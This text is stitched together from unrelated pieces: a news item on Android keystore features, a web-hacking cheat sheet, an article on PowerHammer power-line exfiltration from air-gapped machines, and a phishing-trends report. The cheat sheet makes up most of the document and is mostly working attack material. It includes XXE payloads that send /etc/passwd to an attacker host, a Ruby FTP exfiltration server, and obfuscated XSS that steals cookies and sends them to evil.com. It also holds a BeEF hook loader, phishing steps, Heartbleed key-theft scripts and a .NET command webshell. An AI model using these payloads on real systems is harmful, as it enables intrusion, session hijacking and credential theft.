This is done by the implementation of “keyguard-bound” cryptographic keys, which can be done for any algorithm the developer chooses. The availability of this type of key to perform data decryption is tied directly to the screen-lock state; so, the keys become unavailable as soon as the device is locked, and are only made available again when the user unlocks the device.

“There are times when a mobile application receives data but doesn’t need to immediately access it if the user is not currently using the device,” Google Play researchers said in a posting on Wednesday. “[Now] when the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern or password, any attempt to use these keys will result in an invalid operation.”

This keyguard binding is enforced by the operating system (since secure hardware has no way to know when the screen is locked), and works as an additional layer on top of existing hardware-enforced Android Keystore protection features.

Another new feature, dubbed Secure Key Import, protects sensitive data from being seen by the application or operating system, a timely change given the system broadcast vulnerabilities reported earlier this fall.

From a technical standpoint, when a remote server encrypts a secure key using a public wrapping key from the user’s device, Secure Key Import allows it to also contain a description of the ways the imported key is allowed to be used, and it ensures that a key can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key.

Because the keys are encrypted in transit and remain opaque to the application and operating system, this prevents them from being intercepted or extracted from memory and then used to steal data.

Android Developers in the Hot Seat

Making additional measures available to developers to help them lock down their applications to prevent data leaking or the possibility of data exfiltration is timely; Android developers have been in the hot seat over sloppy data sequestration practices of late.

More specifically, in the last few months, several possibilities for taking advantage of cross-process information leakage came to light.

One main problem area for developers has to do with inter-process communication. While applications on Android are usually segregated by the OS from each other and from the OS itself, there are still mechanisms for sharing information between them when needed. One of those mechanisms is the use of what Android calls “intents.”

An application or the OS itself can send an “intent” message out, which is broadcast system-wide and can be listened to by other applications. Without proper access restrictions and permissions put in place around these intents, it’s possible for malicious applications to intercept information they shouldn’t have access to. This “API-breaking” issue was shown to open the door to a range of nefarious activity, including rogue location tracking and local WiFi network attacks .

Another cross-process problem was revealed at DEFCON , where researchers demonstrated that sloppy Android developers not following security guidelines for external storage could allow an attacker to corrupt data, steal sensitive information or even take control of a mobile phone.

Android’s external storage mechanism is shared across the OS, because it’s designed to enable apps to transfer data from one app to another. So, if a user takes a picture and then wants to send it to someone using a messaging app, the external storage is the platform that allows this to happen.

If developers don’t lock down the type of data that goes to external storage, a bad actor could hijack the communications between privileged apps and the device disk, bypassing sandbox protections to gain access to app functions and potentially wreak havoc. This was dubbed the “man in the disk” issue and was quickly found to affect a range of apps, including Fortnite’s Android app .

Web Fuzz


When you find an endpoint that accepts POST requests, try something like this:

<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <methodCall><methodName>&test;</methodName></methodCall>

If you get an error, try:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test "nice string bro">] > <methodCall><methodName>&test;</methodName></methodCall>

If the entity is resolved, the parser is processing your DTD; try reading a file:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&test;</methodName></methodCall>

Or use a PHP filter wrapper:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">] > <methodCall><methodName>&test;</methodName></methodCall>

Then just base64-decode the result.
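A small scripted version of the same test (a sketch only: the endpoint URL is a placeholder, and in practice you may need to pull the base64 blob out of a larger response body first):

import base64
import requests

payload = """<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">] >
<methodCall><methodName>&test;</methodName></methodCall>"""

r = requests.post("http://target.example/xmlrpc",            # placeholder URL
                  data=payload,
                  headers={"Content-Type": "application/xml"})
print(base64.b64decode(r.text.strip()).decode(errors="replace"))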

Testing WebGoat 8

Try whether you can post a comment that references an entity:

<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <comment><text>&test;</text></comment>

If that works, try the file: protocol:

<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <comment><text>&test;</text></comment>

MUTILLIDAE

To read files on Mutillidae, submit the test payload during the form POST:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>

Or drop the XML version declaration:

<!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>

Or the PHP filter stream mentioned above:

<!DOCTYPE a [<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">] > <methodCall><methodName>&TEST;</methodName></methodCall> OUT OF BAND 基础测试 copy the payload to clipboard <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]><foo>&xxe;</foo>

Check whether a request comes in.



Once that works, move on to the other payloads.

Reading files

wing.xml

<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/lsb-release"> <!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd"> %dtd; ]> <data>&send;</data>

vps->evil.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;

Serve the DTD:

python -m SimpleHTTPServer 8000

Reading files over FTP

evil.xml

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>

Host the DTD file on your VPS:

<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">

A Ruby exploit script:

require 'socket'

ftp_server = TCPServer.new 2121
http_server = TCPServer.new 8088
log = File.open("xxe-ftp.log", "a")
payload = '<!ENTITY % asd SYSTEM "file:///etc/passwd">'

Thread.start do
  loop do
    Thread.start(http_server.accept) do |http_client|
      puts "HTTP. New client connected"
      loop {
        req = http_client.gets()
        break if req.nil?
        if req.start_with? "GET"
          http_client.puts("HTTP/1.1 200 OK\r\nContent-length: #{payload.length}\r\n\r\n#{payload}")
        end
        puts req
      }
      puts "HTTP. Connection closed"
    end
  end
end

Thread.start do
  loop do
    Thread.start(ftp_server.accept) do |ftp_client|
      puts "FTP. New client connected"
      ftp_client.puts("220 xxe-ftp-server")
      loop {
        req = ftp_client.gets()
        break if req.nil?
        puts "< " + req
        log.write "get req: #{req.inspect}\n"
        if req.include? "LIST"
          ftp_client.puts("drwxrwxrwx 1 owner group 1 Feb 21 04:37 test")
          ftp_client.puts("150 Opening BINARY mode data connection for /bin/ls")
          ftp_client.puts("226 Transfer complete.")
        elsif req.include? "USER"
          ftp_client.puts("331 password please - version check")
        elsif req.include? "PORT"
          puts "! PORT received"
          puts "> 200 PORT command ok"
          ftp_client.puts("200 PORT command ok")
        else
          puts "> 230 more data please!"
          ftp_client.puts("230 more data please!")
        end
      }
      puts "FTP. Connection closed"
    end
  end
end

loop do
  sleep(10000)
end

Fuzzing

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE-Fuzzing.txt

XSS

For ASP sites, Unicode-encode the angle brackets; this works for stored XSS:

'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'

XSS via file upload

When you find an upload point, try using a payload as the filename:

<img src=x onerror=alert('XSS')>.png

or:

"><img src=x onerror=alert('XSS')>.png

or:

"><svg onmouseover=alert(1)>.svg

SVG

stuff.svg

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert('XSS!'); </script> </svg>

XML

<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>

CSP BYPASS

script-src self: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

Common payloads:

svg/onload
'-alert(1)-'
eval(atob('YWxlcnQoMSk='))
<iMg SrC=x OnErRoR=alert(1)>
<div onmouseover="alert('XSS');">
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>
""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e

AUTH CRED

When cookies are HttpOnly:

Capture credentials with basic-auth phishing:

1. Register a domain that looks like the target's.
2. Build and run https://github.com/ryhanson/phishery .
3. Set the payload: <img/src/onerror=document.location="https://evil.com/">
4. Wait for the target to come online.

Works well enough.


Stealing cookies

<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>

Blacklist bypass:

When //, :, ", < and > are filtered:

btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')

payload:

eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))

Another one:

<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>

A rather nice payload:

<svg onload=fetch("//attacker/r.php?="%2Bcookie)>

Listen with nc:

nc -lvp 8090

Testing session hijacking

Test by replaying requests with Burp's Repeater and watching what changes with different cookies.

FILTER BYPASS RESOURCES

Collected payloads:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/ https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code https://brutelogic.com.br/blog/avoiding-xss-detection/ https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec

POST-based XSS

If you can't convert a POST-based XSS into a GET request (GET may be disabled on the target server), try CSRF.

DOM XSS

<target.com>/#<img/src/onerror=alert("XSS")>

BeEF hook, URL-encoded:

<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>

#<img/src="1"/onerror=alert(1)>

#><img src=x onerror=prompt(1);>

These sites carry large collections of XSS payloads:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection https://zseano.com/tutorials/4.html https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html http://www.xss-payloads.com/payloads-list.html?a#category=all

Payload generators:

xssor.io http://www.jsfuck.com/ https://github.com/aemkei/jsfuck https://convert.town/ascii-to-text http://jdstiles.com/java/cct.html

SSRF

Whenever you control a URL parameter and the request isn't simply redirected, it's worth testing for SSRF.

Webhooks, PDF generation, document parsing and file uploads all deserve special attention.

PS: https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF

Try to probe internal assets: http://internal-server:22/notarealfile.txt

Vary the port and watch the response to judge whether the port is open.

When there is no visible output, judge by response time, or use DNS logging; Burp's built-in Collaborator works well for this.

In my experience some components only allow certain ports, such as 80, 8080 and 443, so test those first.

If your payload contains a path, it's best to append & or #:

http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000& http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#
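A sketch of the timing-based probe described above, assuming a hypothetical endpoint that fetches an attacker-supplied url parameter:

import time
import requests

TARGET = "http://vulnerable.example/fetch"        # placeholder SSRF endpoint
for port in (22, 80, 443, 8080, 3306):
    probe = "http://internal-server:%d/notarealfile.txt" % port
    start = time.time()
    try:
        requests.get(TARGET, params={"url": probe}, timeout=10)
    except requests.exceptions.RequestException:
        pass                                      # timeouts are data too
    print(port, round(time.time() - start, 2), "seconds")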

This article is a good explainer on SOP, CORS and SSRF: https://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/

Bug Bounty Write-ups:

https://hackerone.com/reports/115748 https://hackerone.com/reports/301924 https://www.sxcurity.pro/hackertarget/ http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/

SQL injection

Testing for SQLi in PUT REST params with sqlmap:

1. Mark the vulnerable parameter with *.
2. Copy the request and paste it into a file.
3. Run sqlmap against it: sqlmap -r <file with request> -vvvv
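For illustration, the saved request might look like this (host and parameter invented), with * marking the injection point:

PUT /api/v1/users/1 HTTP/1.1
Host: target.example
Content-Type: application/json

{"nickname": "test*"}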

Cheat sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Double-encoding the input is also worth a try.

Session fixation

A quick check to determine whether session fixation is a problem on a site:

Go to the login page and note the session ID given to the unauthenticated user. Log in, then note the session ID the user has now. If it matches the session ID the site issued before authentication, the site has a session fixation vulnerability.
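The same check, scripted (a sketch: the URLs, form fields and cookie name all vary per site):

import requests

s = requests.Session()
s.get("https://site.example/login")                    # visit while unauthenticated
before = s.cookies.get("SESSIONID")                    # cookie name is a placeholder
s.post("https://site.example/login",
       data={"user": "me", "pass": "secret"})          # placeholder credentials
after = s.cookies.get("SESSIONID")
print("session fixation!" if before == after else "session ID rotated, looks OK")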

CSRF

Some bypass techniques, even when a CSRF token is present:

https://zseano.com/tutorials/5.html

CSRF against REST APIs:

<html> <script> function jsonreq() { var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST","https://target.com/api/endpoint", true); xmlhttp.setRequestHeader("Content-Type","text/plain"); //xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xmlhttp.withCredentials = true; xmlhttp.send(JSON.stringify({"test":"x"})); } jsonreq(); </script> </html>

Examples:

https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b http://c0rni3sm.blogspot.com/2018/01/1800-in-less-than-hour.html

CSRF TO REDIRECT XSS

<html> <body> <p>Please wait... ;)</p> <script> let host = 'http://target.com' let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e' let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E' function submitRequest() { var req = new XMLHttpRequest(); req.open(<CSRF components, which can easily be copied from Burp's POC generator>); req.setRequestHeader("Accept", "*\/*"); req.withCredentials = true; req.onreadystatechange = function () { if (req.readyState === 4) { executeXSS(); } } req.send(); } function executeXSS() { window.location.assign(host+'<URI with XSS>'+alert_payload); } submitRequest(); </script> </body> </html>

File upload vulnerabilities

Create a 10 GB test file on OS X (useful for testing upload size limits):

mkfile -n 10g temp_10GB_file

Unrestricted file upload

Resources:

http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html

More cheat sheets: https://github.com/jhaddix/tbhm

CORS misconfiguration

A PoC for testing:

<!DOCTYPE html> <html> <body> <center> <h2>CORS POC Exploit</h2> <div id="demo"> <button type="button" onclick="cors()">Exploit</button> </div> <script> function cors() { var req = new XMLHttpRequest(); req.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = this.responseText; // If you want to print something out after it finishes: //alert(req.getAllResponseHeaders()); //alert(localStorage.access_token); } }; // If you need to set a header (you probably won't): // req.setRequestHeader("header name", "value"); req.open("GET", "<site>", true); req.withCredentials = true; req.send(); } </script> </body> </html>

Resources:

https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/ http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html https://www.youtube.com/watch?v=wgkj4ZgxI4c http://ejj.io/misconfigured-cors/ https://www.youtube.com/watch?v=lg31RYYG-T4 https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS https://w3c.github.io/webappsec-cors-for-developers/#cors http://gerionsecurity.com/2013/11/cors-attack-scenarios/ Using CORS misconfiguration to steal a CSRF Token: https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/

Testing for Heartbleed

nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d

Stealing private keys

wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py echo "<target>:<port>" > targets.txt python heartbleed.py -f targets.txt -v -e

wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py python heartbleed-poc.py <target> -p <target port> | less

https://gist.github.com/bonsaiviking/10402038

https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py

Open redirects

http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html

Redirect to BeEF:

<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

Use Burp's Decoder to base64-encode it, then pass it in the payload:

data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==

other:

http://;URL=javascript:alert('XSS') data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect

CRLF injection

When you see a request parameter like this:

http://inj.example.org/redirect.asp?origin=foo

And the response looks like this:

HTTP/1.1 302 Object moved Date: Mon, 07 Mar 2016 17:42:46 GMT Location: account.asp?origin=foo Connection: close Content-Length: 121 <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

Try CRLF injection:

http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a

CRLF: %0d%0a
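A quick scripted check (a sketch; the endpoint is the example host above): if the injected header survives, it shows up in the response.

import requests

url = ("http://inj.example.org/redirect.asp?origin=foo"
       "%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a")
r = requests.get(url, allow_redirects=False)
print(r.headers.get("Set-Cookie"))   # "SessionFixed" here means the CRLF was injected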

https://www.gracefulsecurity.com/http-header-injection/ https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) https://www.acunetix.com/websitesecurity/crlf-injection/ https://blog.innerht.ml/twitter-crlf-injection/

Template injection

You can drop some code into JSFiddle to test payloads:

<html> <head> <meta charset="utf-8"> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script> </head> <body> <div ng-app> {{constructor.constructor('alert(1)')()}} </div> </body> </html>

http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

RCE

Bypassing AV with a webshell upload (.NET):

Here is an example using a webshell from the fuzzdb project:

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e) { }

string executeIt(string arg)
{
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c " + arg;
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();
    return s;
}

void cmdClick(object sender, System.EventArgs e)
{
    Response.Write("<pre>");
    Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
    Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>REALLY NICE</title>
</HEAD>
<body>
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
</form>
</body>
</HTML>

Attack & Defense Frontline: Compromising Air-Gapped Computers over Power Lines

What is a power-line attack?

Power-line attacks are a new type of cross-network attack that has appeared in recent years. Compared with traditional cross-network attacks that use sound, light, electromagnetic emission or heat as the medium, this technique builds a new kind of covert electrical (current) channel: an attacker can obtain information from an air-gapped network through the AC power lines, with stronger stealth and greater potential for harm. Malware running on a standard computer generates a parasitic signal directly on the power line by modulating the CPU workload, and a receiver then senses and demodulates the current in the line to complete the information theft.

Figure 1: The power-line attack technique

What makes this attack special?

Power-line attacks have the following main characteristics:

① Strong stealth: the malware generates the parasitic signal on the power line by modulating CPU workload threads. Because many legitimate processes perform CPU-intensive computation that affects processor load, the attack can inject its transmitting threads into those legitimate processes and thereby evade security detection.

② Long attack range: anywhere in the distribution network feeding the target computer, the attacker only needs to attach a small non-invasive probe to the computer's power cable, or to the wiring at the main electrical service panel of that distribution network, to capture the information.

③ High damage: once the malware is implanted, it can retrieve target data for the attacker (files, encryption keys, tokens, user passwords and so on).

The appearance of this attack upended assumptions about power cables: without the user's knowledge, sensitive data on the computer flows into the attacker's hands over the very cable that supplies the machine with power.

Origins of the power-line attack

Researchers at Ben-Gurion University of the Negev in Israel have long studied stealing data from computers through side-channel attacks. In 2018 they published their latest result, PowerHammer, which covertly exfiltrates highly sensitive data through current fluctuations conducted over power lines; Figure 2 shows the PowerHammer usage scenarios. Power lines exist to supply electrical equipment, and the current on them fluctuates with the load's power consumption. Exactly because of this property, those current fluctuations become a target for attackers to exploit. Extracting sensitive information from a computer through such seemingly "normal" faint variations completely overturned assumptions about power lines, and made people start to take their protection seriously.

Figure 2: PowerHammer usage scenarios

Parasitic signals on the power line

In a standard computer, current flows mainly through the wires feeding the motherboard from the main power supply, and the CPU is one of the largest power consumers on the board. Modern CPUs are high-performance parts, so the CPU's instantaneous workload directly drives dynamic changes in its power consumption. By modulating the CPU's workload, you can control its power draw and therefore the current in the power line; in general, a fully loaded CPU draws more current. Deliberately starting and stopping CPU workloads generates a signal on the power line at a chosen frequency, onto which binary data can be modulated. Mordechai Guri and colleagues designed the signal-generation model as follows: using the CPU cores currently available (cores not used by other processes), they control current consumption by transmitting on different numbers of cores (a fully loaded core draws more current, an idle one less), thereby controlling the carrier amplitude, so that amplitude modulation encodes the data in the signal's amplitude. To distinguish binary 0/1 more reliably during transmission, the researchers used FSK (frequency-shift keying) modulation. As Figure 3 shows, on a 4-core CPU whose cores C1 and C2 are used by other processes, PowerHammer uses the two idle cores C3 and C4 to transmit; the more cores a CPU has, the stronger the effect, since more fully loaded cores draw more current.

Figure 3: A CPU with two transmitting threads
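As a conceptual illustration of that signal-generation model (this is not the researchers' code, and it transmits nothing by itself; it only shapes the machine's power draw), one could on-off key the load on spare cores like this:

import multiprocessing
import time

BIT_TIME = 0.5   # seconds per bit; an arbitrary choice for illustration

def burn(stop_at):
    while time.time() < stop_at:     # busy loop: full core load, higher current
        pass

def transmit(bits, cores=2):         # e.g. the two idle cores C3 and C4
    for b in bits:
        if b == "1":
            stop_at = time.time() + BIT_TIME
            procs = [multiprocessing.Process(target=burn, args=(stop_at,))
                     for _ in range(cores)]
            for p in procs:
                p.start()
            for p in procs:
                p.join()
        else:
            time.sleep(BIT_TIME)     # idle cores, lower current

if __name__ == "__main__":
    transmit("10110010")             # amplitude keying of the power draw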

Attack modes

PowerHammer has two attack modes:

① Line-level power-hammering: the attacker can directly reach the power cable feeding the computer. This mode requires close access to the target and is harder to carry out, but because the current measurements are taken close to the target's power line, there is little noise, so this mode supports a higher exfiltration rate. Point (a) in Figure 4 shows line-level power-hammering.

② Phase-level power-hammering: the attacker can only reach the wiring at the main electrical service panel of the building's distribution network. In this mode the attacker does not need close access to the target; the information can be captured at the service panel. But the longer power-line run adds noise, so this mode only supports a lower exfiltration rate. Point (b) in Figure 4 shows phase-level power-hammering.

In short, the closer to the target, the faster the attacker can receive the data.

Figure 4: PowerHammer attack modes

Assessing the impact

Attacks against air-gapped networks keep emerging in many forms and over a wide range of physical media, and combined techniques that chain several methods for greater damage have also appeared. The power-line attack enjoys a natural stealth advantage, because it rides on the most ubiquitous and necessary transmission medium in the physical world: electricity. Every modern computer needs a power cable, and that necessary "device" is what makes the attack possible. In a power-line attack, signal quality is affected mainly by noise on the grid and comparatively little by attenuation.

The research shows that data can be exfiltrated from an air-gapped computer over the power line at 1000 bit/s with line-level power-hammering and at 10 bit/s with phase-level power-hammering.

Foreseeably, attackers could use power-line techniques against infrastructure such as the power grid, or combine them with other air-gap attack techniques into higher-grade, stealthier and more destructive combined attacks.

Countermeasures

The power-line attack is clever and stealthy, and defending against it has become one of the hot research topics.

① Power-line monitoring: detect covert transmissions by monitoring the current on the line. Continuous analysis of the measurements can reveal hidden transmission patterns, or deviations of a process's behavior from the norm. This approach is hard to deploy, however, and the results may be unreliable.

② Signal filtering: attach power-line (EMI) filters to the lines in the main distribution cabinet to suppress the signals produced by the covert channel. To stop line-level power-hammering, such a filter would have to be installed at every power outlet. But most filters for limiting conducted emissions target higher frequencies, while this covert channel can transmit below 24 kHz, so the attack can sometimes bypass filtering with ease.

③ Signal jamming: a software-level solution starts background processes with random workloads on the machine, using the random signal to jam the malicious process's transmission, but this degrades system performance and is infeasible on real-time systems. A hardware-level solution uses dedicated electronics to mask signals produced by other devices on the line, but it is ineffective against line-level power-hammering.

④ Host-based detection: host-based intrusion detection systems (HIDS) and host-based intrusion prevention systems (HIPS) continuously track processes on the host to spot suspicious behavior. But because many legitimate processes also perform intensive computation that affects processor load, this method may have a high false-positive rate, and if the malware injects its transmitting threads into a legitimate process it can evade detection.

In sum, current countermeasures against power-line attacks still have many problems; their development has a long way to go and deserves continued attention from researchers.

Summary

The power-line attack cleverly exploits the intrinsic properties of power lines, using electricity as the medium to silently steal information from air-gapped computers, with severe consequences. As anti-malware technology matures, attacks that exploit the hardware layer and other physical media keep advancing, and as malware disguise techniques evolve, attacks have shifted from pure malicious-software or pure malicious-hardware attacks to a combined software-and-hardware model. The power-line attack is a product of that combination: malware controls the CPU's workload, and the result of that modulation shows up in the current drawn on the power line. This "soft plus hard" attack model is highly covert and highly destructive.

Although some countermeasures against power-line attacks exist, each has limitations. As the saying goes, however high virtue rises, vice rises higher: today's defenses either sacrifice system performance or tolerate high false-positive rates, and neither guarantees accuracy. As an ordinary user, watch for unknown processes on your machine and install CPU core monitoring software; if anything looks abnormal, terminate the offending process immediately. We also hope this article encourages more researchers to join the work on related defenses and help safeguard information security.

Authors: Xue Yanan, Lü Zhiqiang

Statement: this article comes from the Science and Technology Branch of the China Association for Confidentiality, and copyright belongs to the authors. The content represents only the authors' independent views, not the position of 安全内参; it is reprinted to share information. Contact the original authors for reprint permission.

Phishing Report Shows Microsoft, PayPal and Netflix Are Top Targets


[Translated by 51CTO.com] Email security provider Vade Secure tracked and analyzed the 25 brands most often spoofed in phishing attacks in North America. Its Q3 2018 report tracked 86 brands in total, which accounted for 95% of all the attacks the company detected.

Overall, Vade Secure says phishing attacks rose 20.4% in the third quarter. The number-one target was Microsoft, followed by PayPal, Netflix, Bank of America and Wells Fargo.

Figure 1: The most popular phishing targets

Cloud-based services and financial companies remain the two industries most likely to be hit, and Microsoft is the most coveted brand, with attackers trying to obtain Office 365, OneDrive and Azure logins (that is, credentials).

Vade Secure's report states: "The primary goal of Microsoft phishing attacks is to obtain Office 365 credentials. With a single set of credentials, hackers can access the wealth of confidential files, data and contacts stored in Office 365 applications such as SharePoint, OneDrive, Skype, Excel and CRM. Furthermore, hackers can use these compromised Office 365 accounts to launch additional attacks, including spear phishing, malware, and increasingly, insider attacks targeting other users within the same organization."

Figure 2: Microsoft is the biggest phishing target

Office 365 phishing emails often claim that the recipient's account has been suspended or disabled, then prompt the recipient to log in to resolve the issue. The phishing forms are nearly identical to the legitimate Office 365 ones; by creating a sense of urgency, attackers hope victims will be less vigilant when entering their credentials.

Figure 3: Title

Right behind Microsoft come PayPal phishing scams that go after victims' money, and Netflix scams designed to steal credit card information.

